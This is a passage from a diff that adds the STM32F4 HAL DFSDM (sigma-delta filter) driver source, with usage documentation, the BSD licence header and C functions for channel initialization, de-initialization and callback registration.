HAL_DFSDM_FilterPollForRegConversion() to detect + the end of regular conversion. + (#) In interrupt mode, HAL_DFSDM_FilterRegConvCpltCallback() will be called + at the end of regular conversion. + (#) Get value of regular conversion and corresponding channel using + HAL_DFSDM_FilterGetRegularValue(). + (#) In DMA mode, HAL_DFSDM_FilterRegConvHalfCpltCallback() and + HAL_DFSDM_FilterRegConvCpltCallback() will be called respectively at the + half transfer and at the transfer complete. Please note that + HAL_DFSDM_FilterRegConvHalfCpltCallback() will be called only in DMA + circular mode. + (#) Stop regular conversion using HAL_DFSDM_FilterRegularStop(), + HAL_DFSDM_FilterRegularStop_IT() or HAL_DFSDM_FilterRegularStop_DMA(). + + *** Filter injected channels conversion *** + =========================================== + [..] + (#) Select injected channels using HAL_DFSDM_FilterConfigInjChannel(). + (#) Start injected conversion using HAL_DFSDM_FilterInjectedStart(), + HAL_DFSDM_FilterInjectedStart_IT(), HAL_DFSDM_FilterInjectedStart_DMA() or + HAL_DFSDM_FilterInjectedMsbStart_DMA(). + (#) In polling mode, use HAL_DFSDM_FilterPollForInjConversion() to detect + the end of injected conversion. + (#) In interrupt mode, HAL_DFSDM_FilterInjConvCpltCallback() will be called + at the end of injected conversion. + (#) Get value of injected conversion and corresponding channel using + HAL_DFSDM_FilterGetInjectedValue(). + (#) In DMA mode, HAL_DFSDM_FilterInjConvHalfCpltCallback() and + HAL_DFSDM_FilterInjConvCpltCallback() will be called respectively at the + half transfer and at the transfer complete. Please note that + HAL_DFSDM_FilterInjConvCpltCallback() will be called only in DMA + circular mode. + (#) Stop injected conversion using HAL_DFSDM_FilterInjectedStop(), + HAL_DFSDM_FilterInjectedStop_IT() or HAL_DFSDM_FilterInjectedStop_DMA(). + + *** Filter analog watchdog *** + ============================== + [..] + (#) Start filter analog watchdog using HAL_DFSDM_FilterAwdStart_IT(). + (#) HAL_DFSDM_FilterAwdCallback() will be called if analog watchdog occurs. + (#) Stop filter analog watchdog using HAL_DFSDM_FilterAwdStop_IT(). + + *** Filter extreme detector *** + =============================== + [..] + (#) Start filter extreme detector using HAL_DFSDM_FilterExdStart(). + (#) Get extreme detector maximum value using HAL_DFSDM_FilterGetExdMaxValue(). + (#) Get extreme detector minimum value using HAL_DFSDM_FilterGetExdMinValue(). + (#) Start filter extreme detector using HAL_DFSDM_FilterExdStop(). + + *** Filter conversion time *** + ============================== + [..] + (#) Get conversion time value using HAL_DFSDM_FilterGetConvTimeValue(). + + *** Callback registration *** + ============================= + [..] + The compilation define USE_HAL_DFSDM_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use functions HAL_DFSDM_Channel_RegisterCallback(), + HAL_DFSDM_Filter_RegisterCallback() or + HAL_DFSDM_Filter_RegisterAwdCallback() to register a user callback. + + [..] + Function HAL_DFSDM_Channel_RegisterCallback() allows to register + following callbacks: + (+) CkabCallback : DFSDM channel clock absence detection callback. + (+) ScdCallback : DFSDM channel short circuit detection callback. + (+) MspInitCallback : DFSDM channel MSP init callback. + (+) MspDeInitCallback : DFSDM channel MSP de-init callback. + [..] + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + Function HAL_DFSDM_Filter_RegisterCallback() allows to register + following callbacks: + (+) RegConvCpltCallback : DFSDM filter regular conversion complete callback. + (+) RegConvHalfCpltCallback : DFSDM filter half regular conversion complete callback. + (+) InjConvCpltCallback : DFSDM filter injected conversion complete callback. + (+) InjConvHalfCpltCallback : DFSDM filter half injected conversion complete callback. + (+) ErrorCallback : DFSDM filter error callback. + (+) MspInitCallback : DFSDM filter MSP init callback. + (+) MspDeInitCallback : DFSDM filter MSP de-init callback. + [..] + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + For specific DFSDM filter analog watchdog callback use dedicated register callback: + HAL_DFSDM_Filter_RegisterAwdCallback(). + + [..] + Use functions HAL_DFSDM_Channel_UnRegisterCallback() or + HAL_DFSDM_Filter_UnRegisterCallback() to reset a callback to the default + weak function. + + [..] + HAL_DFSDM_Channel_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + [..] + This function allows to reset following callbacks: + (+) CkabCallback : DFSDM channel clock absence detection callback. + (+) ScdCallback : DFSDM channel short circuit detection callback. + (+) MspInitCallback : DFSDM channel MSP init callback. + (+) MspDeInitCallback : DFSDM channel MSP de-init callback. + + [..] + HAL_DFSDM_Filter_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + [..] + This function allows to reset following callbacks: + (+) RegConvCpltCallback : DFSDM filter regular conversion complete callback. + (+) RegConvHalfCpltCallback : DFSDM filter half regular conversion complete callback. + (+) InjConvCpltCallback : DFSDM filter injected conversion complete callback. + (+) InjConvHalfCpltCallback : DFSDM filter half injected conversion complete callback. + (+) ErrorCallback : DFSDM filter error callback. + (+) MspInitCallback : DFSDM filter MSP init callback. + (+) MspDeInitCallback : DFSDM filter MSP de-init callback. + + [..] + For specific DFSDM filter analog watchdog callback use dedicated unregister callback: + HAL_DFSDM_Filter_UnRegisterAwdCallback(). + + [..] + By default, after the call of init function and if the state is RESET + all callbacks are reset to the corresponding legacy weak functions: + examples HAL_DFSDM_ChannelScdCallback(), HAL_DFSDM_FilterErrorCallback(). + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak functions in the init and de-init only when these + callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the init and de-init keep and use + the user MspInit/MspDeInit callbacks (registered beforehand) + + [..] + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the init/de-init. + In that case first register the MspInit/MspDeInit user callbacks using + HAL_DFSDM_Channel_RegisterCallback() or + HAL_DFSDM_Filter_RegisterCallback() before calling init or de-init function. + + [..] + When The compilation define USE_HAL_DFSDM_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ +#ifdef HAL_DFSDM_MODULE_ENABLED +#if defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** @defgroup DFSDM DFSDM + * @brief DFSDM HAL driver module + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup DFSDM_Private_Define DFSDM Private Define + * @{ + */ + +#define DFSDM_FLTCR1_MSB_RCH_OFFSET 8U + +#define DFSDM_MSB_MASK 0xFFFF0000U +#define DFSDM_LSB_MASK 0x0000FFFFU +#define DFSDM_CKAB_TIMEOUT 5000U +#define DFSDM1_CHANNEL_NUMBER 4U +#if defined (DFSDM2_Channel0) +#define DFSDM2_CHANNEL_NUMBER 8U +#endif /* DFSDM2_Channel0 */ + +/** + * @} + */ +/** @addtogroup DFSDM_Private_Macros +* @{ +*/ + +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/** @defgroup DFSDM_Private_Variables DFSDM Private Variables + * @{ + */ +__IO uint32_t v_dfsdm1ChannelCounter = 0U; +DFSDM_Channel_HandleTypeDef* a_dfsdm1ChannelHandle[DFSDM1_CHANNEL_NUMBER] = {NULL}; + +#if defined (DFSDM2_Channel0) +__IO uint32_t v_dfsdm2ChannelCounter = 0U; +DFSDM_Channel_HandleTypeDef* a_dfsdm2ChannelHandle[DFSDM2_CHANNEL_NUMBER] = {NULL}; +#endif /* DFSDM2_Channel0 */ +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup DFSDM_Private_Functions DFSDM Private Functions + * @{ + */ +static uint32_t DFSDM_GetInjChannelsNbr(uint32_t Channels); +static uint32_t DFSDM_GetChannelFromInstance(DFSDM_Channel_TypeDef* Instance); +static void DFSDM_RegConvStart(DFSDM_Filter_HandleTypeDef *hdfsdm_filter); +static void DFSDM_RegConvStop(DFSDM_Filter_HandleTypeDef* hdfsdm_filter); +static void DFSDM_InjConvStart(DFSDM_Filter_HandleTypeDef* hdfsdm_filter); +static void DFSDM_InjConvStop(DFSDM_Filter_HandleTypeDef* hdfsdm_filter); +static void DFSDM_DMARegularHalfConvCplt(DMA_HandleTypeDef *hdma); +static void DFSDM_DMARegularConvCplt(DMA_HandleTypeDef *hdma); +static void DFSDM_DMAInjectedHalfConvCplt(DMA_HandleTypeDef *hdma); +static void DFSDM_DMAInjectedConvCplt(DMA_HandleTypeDef *hdma); +static void DFSDM_DMAError(DMA_HandleTypeDef *hdma); + +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup DFSDM_Exported_Functions DFSDM Exported Functions + * @{ + */ + +/** @defgroup DFSDM_Exported_Functions_Group1_Channel Channel initialization and de-initialization functions + * @brief Channel initialization and de-initialization functions + * +@verbatim + ============================================================================== + ##### Channel initialization and de-initialization functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Initialize the DFSDM channel. + (+) De-initialize the DFSDM channel. +@endverbatim + * @{ + */ + +/** + * @brief Initialize the DFSDM channel according to the specified parameters + * in the DFSDM_ChannelInitTypeDef structure and initialize the associated handle. + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelInit(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ +#if defined(DFSDM2_Channel0) + __IO uint32_t* channelCounterPtr; + DFSDM_Channel_HandleTypeDef **channelHandleTable; + DFSDM_Channel_TypeDef* channel0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check DFSDM Channel handle */ + if(hdfsdm_channel == NULL) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + assert_param(IS_FUNCTIONAL_STATE(hdfsdm_channel->Init.OutputClock.Activation)); + assert_param(IS_DFSDM_CHANNEL_INPUT(hdfsdm_channel->Init.Input.Multiplexer)); + assert_param(IS_DFSDM_CHANNEL_DATA_PACKING(hdfsdm_channel->Init.Input.DataPacking)); + assert_param(IS_DFSDM_CHANNEL_INPUT_PINS(hdfsdm_channel->Init.Input.Pins)); + assert_param(IS_DFSDM_CHANNEL_SERIAL_INTERFACE_TYPE(hdfsdm_channel->Init.SerialInterface.Type)); + assert_param(IS_DFSDM_CHANNEL_SPI_CLOCK(hdfsdm_channel->Init.SerialInterface.SpiClock)); + assert_param(IS_DFSDM_CHANNEL_FILTER_ORDER(hdfsdm_channel->Init.Awd.FilterOrder)); + assert_param(IS_DFSDM_CHANNEL_FILTER_OVS_RATIO(hdfsdm_channel->Init.Awd.Oversampling)); + assert_param(IS_DFSDM_CHANNEL_OFFSET(hdfsdm_channel->Init.Offset)); + assert_param(IS_DFSDM_CHANNEL_RIGHT_BIT_SHIFT(hdfsdm_channel->Init.RightBitShift)); + +#if defined(DFSDM2_Channel0) + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + channelCounterPtr = &v_dfsdm1ChannelCounter; + channelHandleTable = a_dfsdm1ChannelHandle; + channel0Instance = DFSDM1_Channel0; + } + else + { + channelCounterPtr = &v_dfsdm2ChannelCounter; + channelHandleTable = a_dfsdm2ChannelHandle; + channel0Instance = DFSDM2_Channel0; + } + + /* Check that channel has not been already initialized */ + if(channelHandleTable[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] != NULL) + { + return HAL_ERROR; + } + +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + /* Reset callback pointers to the weak predefined callbacks */ + hdfsdm_channel->CkabCallback = HAL_DFSDM_ChannelCkabCallback; + hdfsdm_channel->ScdCallback = HAL_DFSDM_ChannelScdCallback; + + /* Call MSP init function */ + if(hdfsdm_channel->MspInitCallback == NULL) + { + hdfsdm_channel->MspInitCallback = HAL_DFSDM_ChannelMspInit; + } + hdfsdm_channel->MspInitCallback(hdfsdm_channel); +#else + /* Call MSP init function */ + HAL_DFSDM_ChannelMspInit(hdfsdm_channel); +#endif + + /* Update the channel counter */ + (*channelCounterPtr)++; + + /* Configure output serial clock and enable global DFSDM interface only for first channel */ + if(*channelCounterPtr == 1U) + { + assert_param(IS_DFSDM_CHANNEL_OUTPUT_CLOCK(hdfsdm_channel->Init.OutputClock.Selection)); + /* Set the output serial clock source */ + channel0Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKOUTSRC); + channel0Instance->CHCFGR1 |= hdfsdm_channel->Init.OutputClock.Selection; + + /* Reset clock divider */ + channel0Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKOUTDIV); + if(hdfsdm_channel->Init.OutputClock.Activation == ENABLE) + { + assert_param(IS_DFSDM_CHANNEL_OUTPUT_CLOCK_DIVIDER(hdfsdm_channel->Init.OutputClock.Divider)); + /* Set the output clock divider */ + channel0Instance->CHCFGR1 |= (uint32_t) ((hdfsdm_channel->Init.OutputClock.Divider - 1U) << + DFSDM_CHCFGR1_CKOUTDIV_Pos); + } + + /* enable the DFSDM global interface */ + channel0Instance->CHCFGR1 |= DFSDM_CHCFGR1_DFSDMEN; + } + + /* Set channel input parameters */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_DATPACK | DFSDM_CHCFGR1_DATMPX | + DFSDM_CHCFGR1_CHINSEL); + hdfsdm_channel->Instance->CHCFGR1 |= (hdfsdm_channel->Init.Input.Multiplexer | + hdfsdm_channel->Init.Input.DataPacking | + hdfsdm_channel->Init.Input.Pins); + + /* Set serial interface parameters */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_SITP | DFSDM_CHCFGR1_SPICKSEL); + hdfsdm_channel->Instance->CHCFGR1 |= (hdfsdm_channel->Init.SerialInterface.Type | + hdfsdm_channel->Init.SerialInterface.SpiClock); + + /* Set analog watchdog parameters */ + hdfsdm_channel->Instance->CHAWSCDR &= ~(DFSDM_CHAWSCDR_AWFORD | DFSDM_CHAWSCDR_AWFOSR); + hdfsdm_channel->Instance->CHAWSCDR |= (hdfsdm_channel->Init.Awd.FilterOrder | + ((hdfsdm_channel->Init.Awd.Oversampling - 1U) << DFSDM_CHAWSCDR_AWFOSR_Pos)); + + /* Set channel offset and right bit shift */ + hdfsdm_channel->Instance->CHCFGR2 &= ~(DFSDM_CHCFGR2_OFFSET | DFSDM_CHCFGR2_DTRBS); + hdfsdm_channel->Instance->CHCFGR2 |= (((uint32_t) hdfsdm_channel->Init.Offset << DFSDM_CHCFGR2_OFFSET_Pos) | + (hdfsdm_channel->Init.RightBitShift << DFSDM_CHCFGR2_DTRBS_Pos)); + + /* Enable DFSDM channel */ + hdfsdm_channel->Instance->CHCFGR1 |= DFSDM_CHCFGR1_CHEN; + + /* Set DFSDM Channel to ready state */ + hdfsdm_channel->State = HAL_DFSDM_CHANNEL_STATE_READY; + + /* Store channel handle in DFSDM channel handle table */ + channelHandleTable[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] = hdfsdm_channel; + +#else + /* Check that channel has not been already initialized */ + if(a_dfsdm1ChannelHandle[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] != NULL) + { + return HAL_ERROR; + } + +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + /* Reset callback pointers to the weak predefined callbacks */ + hdfsdm_channel->CkabCallback = HAL_DFSDM_ChannelCkabCallback; + hdfsdm_channel->ScdCallback = HAL_DFSDM_ChannelScdCallback; + + /* Call MSP init function */ + if(hdfsdm_channel->MspInitCallback == NULL) + { + hdfsdm_channel->MspInitCallback = HAL_DFSDM_ChannelMspInit; + } + hdfsdm_channel->MspInitCallback(hdfsdm_channel); +#else + /* Call MSP init function */ + HAL_DFSDM_ChannelMspInit(hdfsdm_channel); +#endif + + /* Update the channel counter */ + v_dfsdm1ChannelCounter++; + + /* Configure output serial clock and enable global DFSDM interface only for first channel */ + if(v_dfsdm1ChannelCounter == 1U) + { + assert_param(IS_DFSDM_CHANNEL_OUTPUT_CLOCK(hdfsdm_channel->Init.OutputClock.Selection)); + /* Set the output serial clock source */ + DFSDM1_Channel0->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKOUTSRC); + DFSDM1_Channel0->CHCFGR1 |= hdfsdm_channel->Init.OutputClock.Selection; + + /* Reset clock divider */ + DFSDM1_Channel0->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKOUTDIV); + if(hdfsdm_channel->Init.OutputClock.Activation == ENABLE) + { + assert_param(IS_DFSDM_CHANNEL_OUTPUT_CLOCK_DIVIDER(hdfsdm_channel->Init.OutputClock.Divider)); + /* Set the output clock divider */ + DFSDM1_Channel0->CHCFGR1 |= (uint32_t) ((hdfsdm_channel->Init.OutputClock.Divider - 1U) << + DFSDM_CHCFGR1_CKOUTDIV_Pos); + } + + /* enable the DFSDM global interface */ + DFSDM1_Channel0->CHCFGR1 |= DFSDM_CHCFGR1_DFSDMEN; + } + + /* Set channel input parameters */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_DATPACK | DFSDM_CHCFGR1_DATMPX | + DFSDM_CHCFGR1_CHINSEL); + hdfsdm_channel->Instance->CHCFGR1 |= (hdfsdm_channel->Init.Input.Multiplexer | + hdfsdm_channel->Init.Input.DataPacking | + hdfsdm_channel->Init.Input.Pins); + + /* Set serial interface parameters */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_SITP | DFSDM_CHCFGR1_SPICKSEL); + hdfsdm_channel->Instance->CHCFGR1 |= (hdfsdm_channel->Init.SerialInterface.Type | + hdfsdm_channel->Init.SerialInterface.SpiClock); + + /* Set analog watchdog parameters */ + hdfsdm_channel->Instance->CHAWSCDR &= ~(DFSDM_CHAWSCDR_AWFORD | DFSDM_CHAWSCDR_AWFOSR); + hdfsdm_channel->Instance->CHAWSCDR |= (hdfsdm_channel->Init.Awd.FilterOrder | + ((hdfsdm_channel->Init.Awd.Oversampling - 1U) << DFSDM_CHAWSCDR_AWFOSR_Pos)); + + /* Set channel offset and right bit shift */ + hdfsdm_channel->Instance->CHCFGR2 &= ~(DFSDM_CHCFGR2_OFFSET | DFSDM_CHCFGR2_DTRBS); + hdfsdm_channel->Instance->CHCFGR2 |= (((uint32_t) hdfsdm_channel->Init.Offset << DFSDM_CHCFGR2_OFFSET_Pos) | + (hdfsdm_channel->Init.RightBitShift << DFSDM_CHCFGR2_DTRBS_Pos)); + + /* Enable DFSDM channel */ + hdfsdm_channel->Instance->CHCFGR1 |= DFSDM_CHCFGR1_CHEN; + + /* Set DFSDM Channel to ready state */ + hdfsdm_channel->State = HAL_DFSDM_CHANNEL_STATE_READY; + + /* Store channel handle in DFSDM channel handle table */ + a_dfsdm1ChannelHandle[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] = hdfsdm_channel; +#endif /* DFSDM2_Channel0 */ + + return HAL_OK; +} + +/** + * @brief De-initialize the DFSDM channel. + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelDeInit(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ +#if defined(DFSDM2_Channel0) + __IO uint32_t* channelCounterPtr; + DFSDM_Channel_HandleTypeDef **channelHandleTable; + DFSDM_Channel_TypeDef* channel0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check DFSDM Channel handle */ + if(hdfsdm_channel == NULL) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + +#if defined(DFSDM2_Channel0) + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + channelCounterPtr = &v_dfsdm1ChannelCounter; + channelHandleTable = a_dfsdm1ChannelHandle; + channel0Instance = DFSDM1_Channel0; + } + else + { + channelCounterPtr = &v_dfsdm2ChannelCounter; + channelHandleTable = a_dfsdm2ChannelHandle; + channel0Instance = DFSDM2_Channel0; + } + + /* Check that channel has not been already deinitialized */ + if(channelHandleTable[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] == NULL) + { + return HAL_ERROR; + } + + /* Disable the DFSDM channel */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CHEN); + + /* Update the channel counter */ + (*channelCounterPtr)--; + + /* Disable global DFSDM at deinit of last channel */ + if(*channelCounterPtr == 0U) + { + channel0Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_DFSDMEN); + } + + /* Call MSP deinit function */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + if(hdfsdm_channel->MspDeInitCallback == NULL) + { + hdfsdm_channel->MspDeInitCallback = HAL_DFSDM_ChannelMspDeInit; + } + hdfsdm_channel->MspDeInitCallback(hdfsdm_channel); +#else + HAL_DFSDM_ChannelMspDeInit(hdfsdm_channel); +#endif + + /* Set DFSDM Channel in reset state */ + hdfsdm_channel->State = HAL_DFSDM_CHANNEL_STATE_RESET; + + /* Reset channel handle in DFSDM channel handle table */ + channelHandleTable[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] = NULL; +#else + /* Check that channel has not been already deinitialized */ + if(a_dfsdm1ChannelHandle[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] == NULL) + { + return HAL_ERROR; + } + + /* Disable the DFSDM channel */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CHEN); + + /* Update the channel counter */ + v_dfsdm1ChannelCounter--; + + /* Disable global DFSDM at deinit of last channel */ + if(v_dfsdm1ChannelCounter == 0U) + { + DFSDM1_Channel0->CHCFGR1 &= ~(DFSDM_CHCFGR1_DFSDMEN); + } + + /* Call MSP deinit function */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + if(hdfsdm_channel->MspDeInitCallback == NULL) + { + hdfsdm_channel->MspDeInitCallback = HAL_DFSDM_ChannelMspDeInit; + } + hdfsdm_channel->MspDeInitCallback(hdfsdm_channel); +#else + HAL_DFSDM_ChannelMspDeInit(hdfsdm_channel); +#endif + + /* Set DFSDM Channel in reset state */ + hdfsdm_channel->State = HAL_DFSDM_CHANNEL_STATE_RESET; + + /* Reset channel handle in DFSDM channel handle table */ + a_dfsdm1ChannelHandle[DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance)] = (DFSDM_Channel_HandleTypeDef *) NULL; +#endif /* defined(DFSDM2_Channel0) */ + + return HAL_OK; +} + +/** + * @brief Initialize the DFSDM channel MSP. + * @param hdfsdm_channel DFSDM channel handle. + * @retval None + */ +__weak void HAL_DFSDM_ChannelMspInit(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_channel); + /* NOTE : This function should not be modified, when the function is needed, + the HAL_DFSDM_ChannelMspInit could be implemented in the user file. + */ +} + +/** + * @brief De-initialize the DFSDM channel MSP. + * @param hdfsdm_channel DFSDM channel handle. + * @retval None + */ +__weak void HAL_DFSDM_ChannelMspDeInit(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_channel); + /* NOTE : This function should not be modified, when the function is needed, + the HAL_DFSDM_ChannelMspDeInit could be implemented in the user file. + */ +} + +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) +/** + * @brief Register a user DFSDM channel callback + * to be used instead of the weak predefined callback. + * @param hdfsdm_channel DFSDM channel handle. + * @param CallbackID ID of the callback to be registered. + * This parameter can be one of the following values: + * @arg @ref HAL_DFSDM_CHANNEL_CKAB_CB_ID clock absence detection callback ID. + * @arg @ref HAL_DFSDM_CHANNEL_SCD_CB_ID short circuit detection callback ID. + * @arg @ref HAL_DFSDM_CHANNEL_MSPINIT_CB_ID MSP init callback ID. + * @arg @ref HAL_DFSDM_CHANNEL_MSPDEINIT_CB_ID MSP de-init callback ID. + * @param pCallback pointer to the callback function. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_Channel_RegisterCallback(DFSDM_Channel_HandleTypeDef *hdfsdm_channel, + HAL_DFSDM_Channel_CallbackIDTypeDef CallbackID, + pDFSDM_Channel_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* update return status */ + status = HAL_ERROR; + } + else + { + if(HAL_DFSDM_CHANNEL_STATE_READY == hdfsdm_channel->State) + { + switch (CallbackID) + { + case HAL_DFSDM_CHANNEL_CKAB_CB_ID : + hdfsdm_channel->CkabCallback = pCallback; + break; + case HAL_DFSDM_CHANNEL_SCD_CB_ID : + hdfsdm_channel->ScdCallback = pCallback; + break; + case HAL_DFSDM_CHANNEL_MSPINIT_CB_ID : + hdfsdm_channel->MspInitCallback = pCallback; + break; + case HAL_DFSDM_CHANNEL_MSPDEINIT_CB_ID : + hdfsdm_channel->MspDeInitCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_DFSDM_CHANNEL_STATE_RESET == hdfsdm_channel->State) + { + switch (CallbackID) + { + case HAL_DFSDM_CHANNEL_MSPINIT_CB_ID : + hdfsdm_channel->MspInitCallback = pCallback; + break; + case HAL_DFSDM_CHANNEL_MSPDEINIT_CB_ID : + hdfsdm_channel->MspDeInitCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + } + return status; +} + +/** + * @brief Unregister a user DFSDM channel callback. + * DFSDM channel callback is redirected to the weak predefined callback. + * @param hdfsdm_channel DFSDM channel handle. + * @param CallbackID ID of the callback to be unregistered. + * This parameter can be one of the following values: + * @arg @ref HAL_DFSDM_CHANNEL_CKAB_CB_ID clock absence detection callback ID. + * @arg @ref HAL_DFSDM_CHANNEL_SCD_CB_ID short circuit detection callback ID. + * @arg @ref HAL_DFSDM_CHANNEL_MSPINIT_CB_ID MSP init callback ID. + * @arg @ref HAL_DFSDM_CHANNEL_MSPDEINIT_CB_ID MSP de-init callback ID. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_Channel_UnRegisterCallback(DFSDM_Channel_HandleTypeDef *hdfsdm_channel, + HAL_DFSDM_Channel_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(HAL_DFSDM_CHANNEL_STATE_READY == hdfsdm_channel->State) + { + switch (CallbackID) + { + case HAL_DFSDM_CHANNEL_CKAB_CB_ID : + hdfsdm_channel->CkabCallback = HAL_DFSDM_ChannelCkabCallback; + break; + case HAL_DFSDM_CHANNEL_SCD_CB_ID : + hdfsdm_channel->ScdCallback = HAL_DFSDM_ChannelScdCallback; + break; + case HAL_DFSDM_CHANNEL_MSPINIT_CB_ID : + hdfsdm_channel->MspInitCallback = HAL_DFSDM_ChannelMspInit; + break; + case HAL_DFSDM_CHANNEL_MSPDEINIT_CB_ID : + hdfsdm_channel->MspDeInitCallback = HAL_DFSDM_ChannelMspDeInit; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_DFSDM_CHANNEL_STATE_RESET == hdfsdm_channel->State) + { + switch (CallbackID) + { + case HAL_DFSDM_CHANNEL_MSPINIT_CB_ID : + hdfsdm_channel->MspInitCallback = HAL_DFSDM_ChannelMspInit; + break; + case HAL_DFSDM_CHANNEL_MSPDEINIT_CB_ID : + hdfsdm_channel->MspDeInitCallback = HAL_DFSDM_ChannelMspDeInit; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + return status; +} +#endif /* USE_HAL_DFSDM_REGISTER_CALLBACKS */ +/** + * @} + */ + +/** @defgroup DFSDM_Exported_Functions_Group2_Channel Channel operation functions + * @brief Channel operation functions + * +@verbatim + ============================================================================== + ##### Channel operation functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Manage clock absence detector feature. + (+) Manage short circuit detector feature. + (+) Get analog watchdog value. + (+) Modify offset value. +@endverbatim + * @{ + */ + +/** + * @brief This function allows to start clock absence detection in polling mode. + * @note Same mode has to be used for all channels. + * @note If clock is not available on this channel during 5 seconds, + * clock absence detection will not be activated and function + * will return HAL_TIMEOUT error. + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelCkabStart(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tickstart; + uint32_t channel; + +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { +#if defined (DFSDM2_Channel0) + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = 